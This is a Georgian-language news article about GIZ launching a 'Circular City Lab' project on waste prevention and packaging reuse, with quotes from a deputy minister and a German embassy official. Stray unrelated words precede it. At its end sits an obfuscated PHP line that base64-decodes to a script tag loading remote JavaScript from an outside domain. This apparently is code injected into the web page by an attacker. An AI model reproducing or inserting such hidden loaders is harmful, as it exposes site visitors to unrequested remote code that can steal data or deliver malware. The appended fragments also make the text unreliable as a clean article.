celsiusi
ავერსი შნაიდერი

გერმანიის საერთაშორისო თანამშრომლობის საზოგადოება (GIZ) საქართველოში ახალ პროექტს „ცირკულარული ქალაქის ლაბორატორია“ იწყებს. პროექტის პრეზენტაციას გარემოს დაცვისა და სოფლის მეურნეობის მინისტრის მოადგილე სოლომონ პავლიაშვილი დაესწრო. მინისტრის მოადგილემ GIZ-ის წარმომადგენლებს მადლობა გადაუხადა მხარდაჭერისთვის და აღნიშნა, რომ დონორი ორგანიზაციების ჩართულობა ქვეყნის მწვანე ეკონომიკაზე გადასვლის პროცესში უმნიშვნელოვანესია. აღსანიშნავია, რომ პროექტის სამიზნე ჯგუფია ადგილობრივი ბიზნესი, განსაკუთრებით ქალი მეწარმეები. პროექტი გერმანიის ეკონომიკური თანამშრომლობისა და განვითარების ფედერალური სამინისტროს ფინანსური მხარდაჭერით განხორციელდება.

„ნარჩენების მართვა საქართველოს მთავრობისთვის პრიორიტეტული მიმართულებაა. საქართველოს მიღებული აქვს ნარჩენების მართვის სტრატეგია და ეროვნული გეგმა, სადაც ძირითადი ყურადღება სწორედ ნარჩენების პრევენციას, ნარჩენების ხელმეორედ გამოყენებას და რეციკლირებას ეთმობა. შეფუთვის ნარჩენები დღემდე ერთ-ერთ მთავარ გამოწვევად რჩება. საქართველოში წელიწადში დაახლოებით 200-250 ათასი ტონა შეფუთვის ნარჩენი გროვდება, რაც მთელი ნარჩენების 16-17%-ია. ჩვენი მიზანი გარემოს დაცვაზე ორიენტირებული ეკონომიკის ჩამოყალიბებაა“, - განაცხადა სოლომონ პავლიაშვილმა.

გერმანიის საელჩოს სამხრეთ კავკასიის განვითარების თანამშრომლობის განყოფილების უფროსის, ლიდია ქრისტმანის განცხადებით, სამართლებრივი ჩარჩოების და პოლიტიკის დოკუმენტების შექმნის მიმართულებით საქართველომ მნიშვნელოვანი ნაბიჯები უკვე გადადგა, ახლა ძირითადი ყურადღება ამ დოკუმენტების იმპლემენტაციას უნდა დაეთმოს.

„ვაფასებ საქართველოს მისწრაფებას, დანერგოს ნარჩენების მართვის საერთაშორისო პრაქტიკა. მრავალჯერადი გამოყენების შეფუთვის სისტემების იმპლემენტაცია ცირკულარულ ეკონომიკაზე გადასვლისკენ გადადგმული მნიშვნელოვანი ნაბიჯია. რაც უფრო ნაკლები შეფუთვა გამოიყენება, მით ნაკლები ნარჩენი წარმოიქმნება, ეს პრობლემის მოგვარების გასაღებია. გარდა ამისა, ეს ფინანსური რესურსების დაზოგვის და სათბური აირების გამოყოფის შემცირების საუკეთესო საშუალებაა“, - აღნიშნა ლიდია ქრისტმანმა.

პროექტის წარდგენის პარალელურად, პანელური დისკუსია „ცირკულარული ეკონომიკა, ნარჩენების პრევენცია და ხელახალი გამოყენება საქართველოში“ გაიმართა, რომლის ფარგლებშიც საქართველოში ცირკულარული ეკონომიკის განვითარებაზე და ნარჩენების მართვის სისტემების დანერგვის საკითხებზე იმსჯელეს.

153
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");